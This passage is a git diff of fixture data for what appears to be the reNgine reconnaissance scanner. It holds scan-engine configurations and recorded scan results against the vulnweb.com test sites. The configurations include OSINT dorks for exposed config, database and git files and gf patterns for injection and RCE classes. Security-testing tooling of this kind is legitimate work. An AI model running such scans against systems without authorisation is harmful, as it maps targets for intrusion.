'use_amass_config': false,\r\n # 'amass_wordlist': 'deepmagic.com-prefixes-top50000'\r\n}\r\nhttp_crawl: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0'\r\n # },\r\n # 'threads': 30,\r\n # 'follow_redirect': false\r\n}\r\nport_scan: {\r\n 'enable_http_crawl': true,\r\n 'timeout': 5,\r\n # 'exclude_ports': [],\r\n # 'exclude_subdomains': [],\r\n 'ports': ['top-100'],\r\n 'rate_limit': 150,\r\n 'threads': 30,\r\n 'passive': false,\r\n # 'use_naabu_config': false,\r\n # 'enable_nmap': true,\r\n # 'nmap_cmd': '',\r\n # 'nmap_script': '',\r\n # 'nmap_script_args': ''\r\n}\r\nosint: {\r\n 'discover': [\r\n 'emails',\r\n 'metainfo',\r\n 'employees'\r\n ],\r\n 'dorks': [\r\n 'login_pages',\r\n 'admin_panels',\r\n 'dashboard_pages',\r\n 'stackoverflow',\r\n 'social_media',\r\n 'project_management',\r\n 'code_sharing',\r\n 'config_files',\r\n 'jenkins',\r\n 'wordpress_files',\r\n 'php_error',\r\n 'exposed_documents',\r\n 'db_files',\r\n 'git_exposed'\r\n ],\r\n # 'custom_dorks': [],\r\n 'intensity': 'normal',\r\n 'documents_limit': 50\r\n}\r\ndir_file_fuzz: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0',\r\n # 'Custom-Header': 'My custom header'\r\n # },\r\n 'auto_calibration': true,\r\n 'enable_http_crawl': true,\r\n 'rate_limit': 150,\r\n 'extensions': [],\r\n # 'extensions': ['html', 'php','git','yaml','conf','cnf','config','gz','env','log','db','mysql','bak','asp','aspx','txt','conf','sql','json','yml','pdf'],\r\n 'follow_redirect': false,\r\n 'max_time': 0,\r\n 'match_http_status': [200, 204],\r\n 'recursive_level': 0,\r\n 'stop_on_error': false,\r\n 'timeout': 5,\r\n 'threads': 30,\r\n 'wordlist_name': 'default', # fuzz-Bo0oM\r\n}\r\nfetch_url: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0',\r\n # 'Custom-Header': 'My custom header'\r\n # },\r\n 'uses_tools': ['gospider', 'hakrawler', 'waybackurls', 'katana', 'gau'],\r\n 'remove_duplicate_endpoints': true,\r\n 'duplicate_fields': ['content_length', 'page_title'],\r\n 'follow_redirect': false,\r\n 'enable_http_crawl': true,\r\n 'gf_patterns': ['debug_logic', 'idor', 'interestingEXT', 'interestingparams', 'interestingsubs', 'lfi', 'rce', 'redirect', 'sqli', 'ssrf', 'ssti', 'xss'],\r\n 'ignore_file_extensions': ['png', 'jpg', 'jpeg', 'gif', 'mp4', 'mpeg', 'mp3'],\r\n 'threads': 30,\r\n # 'exclude_subdomains': false\r\n}\r\nvulnerability_scan: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0',\r\n # 'Custom-Header': 'My custom header'\r\n # },\r\n 'run_nuclei': true,\r\n 'run_dalfox': false,\r\n 'run_crlfuzz': false,\r\n 'run_s3scanner': false,\r\n 'enable_http_crawl': true,\r\n 'concurrency': 50,\r\n 'intensity': 'normal',\r\n 'rate_limit': 150,\r\n 'retries': 1,\r\n 'timeout': 5,\r\n 'fetch_gpt_report': true,\r\n 'nuclei': {\r\n 'use_nuclei_config': false,\r\n 'severities': ['unknown', 'info', 'low', 'medium', 'high', 'critical'],\r\n # 'tags': [], # Nuclei tags (https://github.com/projectdiscovery/nuclei-templates)\r\n # 'templates': [], # Nuclei templates (https://github.com/projectdiscovery/nuclei-templates)\r\n # 'custom_templates': [] # Nuclei custom templates uploaded in reNgine\r\n }\r\n}\r\nwaf_detection: {\r\n 'enable_http_crawl': true\r\n}\r\nscreenshot: {\r\n 'enable_http_crawl': true,\r\n 'intensity': 'normal',\r\n 'timeout': 10,\r\n 'threads': 40\r\n}", + "default_engine": null } }, { @@ -53,15 +53,6 @@ "default_engine": true } }, -{ - "model": "scanEngine.enginetype", - "pk": 7, - "fields": { - "engine_name": "Full (perso)", - "yaml_configuration": "# Global vars for all tools\r\n#\r\n# Custom header - FFUF, Nuclei, Dalfox, CRL Fuzz, HTTPx, Fetch URL (Hakrawler, Katana, Gospider)\r\n# custom_header: {\r\n# 'Cookie':'Test',\r\n# 'User-Agent': 'Mozilla/5.0',\r\n# 'Custom-Header': 'My custom header'\r\n# }\r\n# 'user_agent': '' # Dalfox only\r\n# 'enable_http_crawl': true # All tools\r\n# 'timeout': 10 # Subdomain discovery, Screenshot, Port scan, FFUF, Nuclei \r\n# 'threads': 30 # All tools\r\n# 'rate_limit': 150 # Port scan, FFUF, Nuclei\r\n# 'intensity': 'normal' # Screenshot (grab only the root endpoints of each subdomain), Nuclei (reduce number of endpoints to scan), OSINT (not implemented yet)\r\n# 'retries': 1 # Nuclei\r\n\r\nsubdomain_discovery: {\r\n 'uses_tools': ['subfinder', 'ctfr', 'sublist3r', 'tlsx', 'oneforall', 'netlas'], # amass-passive, amass-active, All\r\n 'enable_http_crawl': true,\r\n 'threads': 30,\r\n 'timeout': 5,\r\n # 'use_subfinder_config': false,\r\n # 'use_amass_config': false,\r\n # 'amass_wordlist': 'deepmagic.com-prefixes-top50000'\r\n}\r\nhttp_crawl: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0'\r\n # },\r\n # 'threads': 30,\r\n # 'follow_redirect': false\r\n}\r\nport_scan: {\r\n 'enable_http_crawl': true,\r\n 'timeout': 5,\r\n # 'exclude_ports': [],\r\n # 'exclude_subdomains': [],\r\n 'ports': ['top-100'],\r\n 'rate_limit': 150,\r\n 'threads': 30,\r\n 'passive': false,\r\n # 'use_naabu_config': false,\r\n # 'enable_nmap': true,\r\n # 'nmap_cmd': '',\r\n # 'nmap_script': '',\r\n # 'nmap_script_args': ''\r\n}\r\nosint: {\r\n 'discover': [\r\n 'emails',\r\n 'metainfo',\r\n 'employees'\r\n ],\r\n 'dorks': [\r\n 'login_pages',\r\n 'admin_panels',\r\n 'dashboard_pages',\r\n 'stackoverflow',\r\n 'social_media',\r\n 'project_management',\r\n 'code_sharing',\r\n 'config_files',\r\n 'jenkins',\r\n 'wordpress_files',\r\n 'php_error',\r\n 'exposed_documents',\r\n 'db_files',\r\n 'git_exposed'\r\n ],\r\n # 'custom_dorks': [],\r\n 'intensity': 'normal',\r\n 'documents_limit': 50\r\n}\r\ndir_file_fuzz: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0',\r\n # 'Custom-Header': 'My custom header'\r\n # },\r\n 'auto_calibration': true,\r\n 'enable_http_crawl': true,\r\n 'rate_limit': 150,\r\n 'extensions': [],\r\n 'follow_redirect': false,\r\n 'max_time': 0,\r\n 'match_http_status': [200, 204],\r\n 'recursive_level': 0,\r\n 'stop_on_error': false,\r\n 'timeout': 5,\r\n 'threads': 30,\r\n 'wordlist_name': 'default', # fuzz-Bo0oM,\r\n}\r\nfetch_url: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0',\r\n # 'Custom-Header': 'My custom header'\r\n # },\r\n 'uses_tools': ['gospider', 'hakrawler', 'waybackurls', 'katana', 'gau'],\r\n 'remove_duplicate_endpoints': true,\r\n 'duplicate_fields': ['content_length', 'page_title'],\r\n 'follow_redirect': false,\r\n 'enable_http_crawl': true,\r\n 'gf_patterns': ['debug_logic', 'idor', 'interestingEXT', 'interestingparams', 'interestingsubs', 'lfi', 'rce', 'redirect', 'sqli', 'ssrf', 'ssti', 'xss'],\r\n 'ignore_file_extensions': ['png', 'jpg', 'jpeg', 'gif', 'mp4', 'mpeg', 'mp3'],\r\n 'threads': 30,\r\n # 'exclude_subdomains': false\r\n}\r\nvulnerability_scan: {\r\n # 'custom_header': {\r\n # 'Cookie':'Test',\r\n # 'User-Agent': 'Mozilla/5.0',\r\n # 'Custom-Header': 'My custom header'\r\n # },\r\n 'run_nuclei': true,\r\n 'run_dalfox': false,\r\n 'run_crlfuzz': false,\r\n 'run_s3scanner': false,\r\n 'enable_http_crawl': true,\r\n 'concurrency': 50,\r\n 'intensity': 'normal',\r\n 'rate_limit': 150,\r\n 'retries': 1,\r\n 'timeout': 5,\r\n 'fetch_llm_report': true,\r\n 'nuclei': {\r\n 'use_nuclei_config': false,\r\n 'severities': ['unknown', 'info', 'low', 'medium', 'high', 'critical'],\r\n # 'tags': [], # Nuclei tags (https://github.com/projectdiscovery/nuclei-templates)\r\n # 'templates': [], # Nuclei templates (https://github.com/projectdiscovery/nuclei-templates)\r\n # 'custom_templates': [] # Nuclei custom templates uploaded in reNgine\r\n }\r\n}\r\nwaf_detection: {\r\n 'enable_http_crawl': true\r\n}\r\nscreenshot: {\r\n 'enable_http_crawl': true,\r\n 'intensity': 'normal',\r\n 'timeout': 10,\r\n 'threads': 40\r\n}", - "default_engine": false - } -}, { "model": "scanEngine.interestinglookupmodel", "pk": 1, @@ -73,6 +64,17 @@ "condition_200_http_lookup": false } }, +{ + "model": "scanEngine.interestinglookupmodel", + "pk": 2, + "fields": { + "keywords": "sql, ftp", + "custom_type": true, + "title_lookup": true, + "url_lookup": true, + "condition_200_http_lookup": true + } +}, { "model": "scanEngine.installedexternaltool", "pk": 1, diff --git a/web/startScan/fixtures/startScan.json b/web/startScan/fixtures/startScan.json index 929ab016..06801c29 100644 --- a/web/startScan/fixtures/startScan.json +++ b/web/startScan/fixtures/startScan.json @@ -3,14 +3,14 @@ "model": "startScan.scanhistory", "pk": 1, "fields": { - "start_scan_date": "2024-09-03T21:25:45.594Z", + "start_scan_date": "2024-11-13T02:04:15.201Z", "scan_status": 2, - "results_dir": "/home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97", + "results_dir": "/home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b", "domain": 1, - "scan_type": 7, - "celery_ids": "[\"c2de965c-4db3-405b-b58d-9894f18306b2\", \"d3715a2f-20dd-471f-a1b6-0a7f35472afd\", \"a0d9c581-9f0f-46e9-ad45-2abb20681fe0\", null, \"13e72a80-8f84-4ae6-b47f-081f0ecd4b6c\", \"3596c2c2-2dca-4164-b342-b5046c697304\", \"dc33f486-7ad0-4c73-a355-4c93df4538af\", \"b74526bd-8f9a-4738-a98f-876ba776da33\", \"e1351fcc-958c-4fd2-941b-e8c34c3db9d9\", \"e61a5153-22d3-4890-984c-c45177e93baa\", \"267cc8e5-24ab-4651-a708-4286b4506ee0\", \"3f932d02-9beb-4c0b-9cb0-394fc6e73401\"]", + "scan_type": 1, + "celery_ids": "[\"d4428abc-8a60-42b2-9a21-438847ad17f3\", \"c21e04d9-1a50-498f-9fb5-8da002954725\", \"621c1e07-7ce0-4476-bc9d-17cb178fa2ae\", null, \"d6ecf5cb-19bb-4ca7-9e06-2cf087298742\", \"fae27562-787c-4c98-9c43-4f9038c61d4a\", \"370bd224-0baf-4f18-b41e-55c9f17908a4\", \"6997b1ed-2d9e-4a21-b66f-18fec1066b51\", \"960e4a72-c046-4c80-832f-47ec3413f634\", \"b2d9eef0-7a2d-442c-9455-9fac73a8631e\", \"8cc54d6b-efb8-4166-8177-5bd14e2f4e53\", \"8baf541c-f14a-42a5-b7fb-0f332f39e8b9\"]", "tasks": "[\"subdomain_discovery\", \"http_crawl\", \"port_scan\", \"osint\", \"dir_file_fuzz\", \"fetch_url\", \"vulnerability_scan\", \"waf_detection\", \"screenshot\"]", - "stop_scan_date": "2024-09-03T22:29:36.469Z", + "stop_scan_date": "2024-11-13T02:56:43.277Z", "used_gf_patterns": "debug_logic,idor,interestingEXT,interestingparams,interestingsubs,lfi,rce,redirect,sqli,ssrf,ssti,xss", "error_message": null, "initiated_by": 1, @@ -22,124 +22,13 @@ 1, 2, 3, - 4, - 5, - 6, - 7, - 8, - 9, - 10, - 11, - 12, - 13, - 14, - 15, - 16, - 17, - 18, - 19, - 20, - 21, - 22, - 23, - 24, - 25, - 26, - 27, - 28, - 29, - 30, - 31, - 32, - 33, - 34, - 35, - 36, - 37, - 38, - 39, - 40, - 41, - 42, - 43, - 44, - 45, - 46, - 47, - 48, - 49, - 50, - 51, - 52, - 53, - 54, - 55, - 56, - 57, - 58, - 59, - 60, - 61, - 62, - 63, - 64, - 65, - 66, - 67, - 68, - 69, - 70, - 71, - 72, - 73, - 74, - 75, - 76, - 77 + 4 ] } }, { "model": "startScan.subdomain", "pk": 1, - "fields": { - "scan_history": 1, - "target_domain": 1, - "name": "testphp.vulnweb.com", - "is_imported_subdomain": true, - "is_important": false, - "http_url": "http://testphp.vulnweb.com", - "screenshot_path": "/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/screenshots/screens/http.testphp.vulnweb.com.png", - "http_header_path": null, - "discovered_date": "2024-09-03T21:25:45.864Z", - "cname": null, - "is_cdn": false, - "cdn_name": null, - "http_status": 200, - "content_type": "text/html", - "response_time": 0.345110429, - "webserver": "nginx/1.19.0", - "content_length": 4958, - "page_title": "Home of Acunetix Art", - "attack_surface": null, - "technologies": [ - 1, - 2, - 3, - 4 - ], - "ip_addresses": [ - 1 - ], - "directories": [ - 5 - ], - "waf": [] - } -}, -{ - "model": "startScan.subdomain", - "pk": 2, "fields": { "scan_history": 1, "target_domain": 1, @@ -147,21 +36,21 @@ "is_imported_subdomain": false, "is_important": false, "http_url": "http://vulnweb.com", - "screenshot_path": "/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/screenshots/screens/http.vulnweb.com.png", + "screenshot_path": "/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots/screens/http.vulnweb.com.png", "http_header_path": null, - "discovered_date": "2024-09-03T21:25:57.076Z", + "discovered_date": "2024-11-13T02:04:15.302Z", "cname": null, "is_cdn": false, "cdn_name": null, "http_status": 200, "content_type": "text/html", - "response_time": 0.352853777, + "response_time": 0.344256139, "webserver": "nginx/1.19.0", "content_length": 4018, "page_title": "Acunetix Web Vulnerability Scanner - Test websites", "attack_surface": null, "technologies": [ - 2 + 1 ], "ip_addresses": [ 1 @@ -174,7 +63,7 @@ }, { "model": "startScan.subdomain", - "pk": 16, + "pk": 68, "fields": { "scan_history": 1, "target_domain": 1, @@ -182,26 +71,26 @@ "is_imported_subdomain": false, "is_important": false, "http_url": "http://rest.vulnweb.com", - "screenshot_path": "/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/screenshots/screens/http.rest.vulnweb.com.png", + "screenshot_path": "/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots/screens/http.rest.vulnweb.com.png", "http_header_path": null, - "discovered_date": "2024-09-03T21:28:09.647Z", + "discovered_date": "2024-11-13T02:06:45.926Z", "cname": null, "is_cdn": false, "cdn_name": null, "http_status": 200, "content_type": "text/html", - "response_time": 0.422205408, + "response_time": 0.199289656, "webserver": "Apache/2.4.25 (Debian)", - "content_length": 3555, - "page_title": "Acunetix Vulnerable REST API", + "content_length": 3556, + "page_title": "Invicti Vulnerable REST API", "attack_surface": null, "technologies": [ - 9, - 10, - 11 + 2, + 3, + 4 ], "ip_addresses": [ - 3 + 2 ], "directories": [ 1 @@ -211,7 +100,7 @@ }, { "model": "startScan.subdomain", - "pk": 23, + "pk": 75, "fields": { "scan_history": 1, "target_domain": 1, @@ -219,27 +108,27 @@ "is_imported_subdomain": false, "is_important": false, "http_url": "http://testasp.vulnweb.com", - "screenshot_path": "/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/screenshots/screens/http.testasp.vulnweb.com.png", + "screenshot_path": "/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots/screens/http.testasp.vulnweb.com.png", "http_header_path": null, - "discovered_date": "2024-09-03T21:28:09.673Z", + "discovered_date": "2024-11-13T02:06:46.149Z", "cname": null, "is_cdn": false, "cdn_name": null, "http_status": 200, "content_type": "text/html", - "response_time": 0.36117539699999995, + "response_time": 0.35428247199999996, "webserver": "Microsoft-IIS/8.5", - "content_length": 3537, + "content_length": 3539, "page_title": "acuforum forums", "attack_surface": null, "technologies": [ - 1, + 5, 6, 7, 8 ], "ip_addresses": [ - 2 + 3 ], "directories": [ 2 @@ -249,7 +138,7 @@ }, { "model": "startScan.subdomain", - "pk": 24, + "pk": 76, "fields": { "scan_history": 1, "target_domain": 1, @@ -257,17 +146,17 @@ "is_imported_subdomain": false, "is_important": false, "http_url": "http://testaspnet.vulnweb.com", - "screenshot_path": "/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/screenshots/screens/http.testaspnet.vulnweb.com.png", + "screenshot_path": "/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots/screens/http.testaspnet.vulnweb.com.png", "http_header_path": null, - "discovered_date": "2024-09-03T21:28:09.677Z", + "discovered_date": "2024-11-13T02:06:46.178Z", "cname": null, "is_cdn": false, "cdn_name": null, "http_status": 200, "content_type": "text/html", - "response_time": 0.535234499, + "response_time": 0.5203605579999999, "webserver": "Microsoft-IIS/8.5", - "content_length": 14082, + "content_length": 14066, "page_title": "acublog news", "attack_surface": null, "technologies": [ @@ -277,7 +166,7 @@ 13 ], "ip_addresses": [ - 2 + 3 ], "directories": [ 3 @@ -287,7 +176,7 @@ }, { "model": "startScan.subdomain", - "pk": 26, + "pk": 82, "fields": { "scan_history": 1, "target_domain": 1, @@ -295,22 +184,22 @@ "is_imported_subdomain": false, "is_important": false, "http_url": "http://testhtml5.vulnweb.com", - "screenshot_path": "/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/screenshots/screens/http.testhtml5.vulnweb.com.png", + "screenshot_path": "/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots/screens/http.testhtml5.vulnweb.com.png", "http_header_path": null, - "discovered_date": "2024-09-03T21:28:09.686Z", + "discovered_date": "2024-11-13T02:06:46.343Z", "cname": null, "is_cdn": false, "cdn_name": null, "http_status": 200, "content_type": "text/html", - "response_time": 0.342381867, + "response_time": 0.352482772, "webserver": "nginx/1.19.0", "content_length": 6940, "page_title": "SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner", "attack_surface": null, "technologies": [ - 2, - 5 + 1, + 11 ], "ip_addresses": [ 1 @@ -323,7 +212,45 @@ }, { "model": "startScan.subdomain", - "pk": 38, + "pk": 88, + "fields": { + "scan_history": 1, + "target_domain": 1, + "name": "testphp.vulnweb.com", + "is_imported_subdomain": false, + "is_important": false, + "http_url": "http://testphp.vulnweb.com", + "screenshot_path": "/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots/screens/http.testphp.vulnweb.com.png", + "http_header_path": null, + "discovered_date": "2024-11-13T02:06:46.513Z", + "cname": null, + "is_cdn": false, + "cdn_name": null, + "http_status": 200, + "content_type": "text/html", + "response_time": 0.34711417699999997, + "webserver": "nginx/1.19.0", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "attack_surface": null, + "technologies": [ + 1, + 5, + 9, + 10 + ], + "ip_addresses": [ + 1 + ], + "directories": [ + 5 + ], + "waf": [] + } +}, +{ + "model": "startScan.subdomain", + "pk": 112, "fields": { "scan_history": 1, "target_domain": 1, @@ -331,21 +258,21 @@ "is_imported_subdomain": false, "is_important": false, "http_url": "http://www.vulnweb.com", - "screenshot_path": "/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/screenshots/screens/http.www.vulnweb.com.png", + "screenshot_path": "/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/screenshots/screens/http.www.vulnweb.com.png", "http_header_path": null, - "discovered_date": "2024-09-03T21:28:09.730Z", + "discovered_date": "2024-11-13T02:06:47.245Z", "cname": null, "is_cdn": false, "cdn_name": null, "http_status": 200, "content_type": "text/html", - "response_time": 0.352635869, + "response_time": 0.351433339, "webserver": "nginx/1.19.0", "content_length": 4018, "page_title": "Acunetix Web Vulnerability Scanner - Test websites", "attack_surface": null, "technologies": [ - 2 + 1 ], "ip_addresses": [ 1 @@ -357,3036 +284,67331 @@ } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 1, "fields": { - "name": "dns" + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com", + "content_length": 4018, + "page_title": "Acunetix Web Vulnerability Scanner - Test websites", + "http_status": 405, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:04:27.319Z", + "response_time": 0.351930968, + "webserver": "nginx/1.19.0", + "is_default": true, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 2, "fields": { - "name": "caa" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com", + "content_length": 3556, + "page_title": "Invicti Vulnerable REST API", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:07:19.559Z", + "response_time": 0.20446065100000002, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": true, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 3, "fields": { - "name": "spf" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com", + "content_length": 3541, + "page_title": "acuforum forums", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:07:19.994Z", + "response_time": 0.359268385, + "webserver": "Microsoft-IIS/8.5", + "is_default": true, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 4, "fields": { - "name": "txt" + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:07:20.209Z", + "response_time": 0.365941337, + "webserver": "nginx/1.19.0", + "is_default": true, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 5, "fields": { - "name": "tech" + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com", + "content_length": 6940, + "page_title": "SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:07:20.385Z", + "response_time": 0.365578064, + "webserver": "nginx/1.19.0", + "is_default": true, + "matched_gf_patterns": null, + "techs": [ + 1, + 11 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 6, "fields": { - "name": "nginx" + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com", + "content_length": 14069, + "page_title": "acublog news", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:07:20.520Z", + "response_time": 1.325135154, + "webserver": "Microsoft-IIS/8.5", + "is_default": true, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 7, "fields": { - "name": "misconfig" + "scan_history": 1, + "target_domain": 1, + "subdomain": 112, + "source": null, + "http_url": "http://www.vulnweb.com", + "content_length": 4018, + "page_title": "Acunetix Web Vulnerability Scanner - Test websites", + "http_status": 405, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:07:30.255Z", + "response_time": 0.362490225, + "webserver": "nginx/1.19.0", + "is_default": true, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 8, "fields": { - "name": "http" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com:8081", + "content_length": 40, + "page_title": null, + "http_status": 200, + "content_type": "application/json", + "discovered_date": "2024-11-13T02:07:37.934Z", + "response_time": 0.19818815, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 9, "fields": { - "name": "cookie" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/locale.js?v=1600695504196", + "content_length": 1300, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:01.970Z", + "response_time": 0.18466682599999998, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 10, "fields": { - "name": "generic" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/pl.js?v=1596328981612", + "content_length": 1251, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.105Z", + "response_time": 0.184753494, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 11, "fields": { - "name": "apache" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/nl.js?v=1596328981612", + "content_length": 1266, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.208Z", + "response_time": 0.186077175, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 12, "fields": { - "name": "php" - } -}, -{ - "model": "startScan.vulnerabilitytags", + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/de.js?v=1596328981612", + "content_length": 1259, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.314Z", + "response_time": 0.186640415, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", "pk": 13, "fields": { - "name": "ns" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/nl.js?v=1600695504196", + "content_length": 1266, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.423Z", + "response_time": 0.18739621299999998, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 14, "fields": { - "name": "form" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/es.js?v=1596328981612", + "content_length": 1269, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.526Z", + "response_time": 0.19387811400000002, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 15, "fields": { - "name": "misc" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/ca.js?v=1596328981612", + "content_length": 1250, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.631Z", + "response_time": 0.194492455, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 16, "fields": { - "name": "miscellaneous" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/cs.js?v=1596328981612", + "content_length": 1271, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.734Z", + "response_time": 0.19632162400000003, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 17, "fields": { - "name": "cve" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/es.js?v=1600695504196", + "content_length": 1269, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": 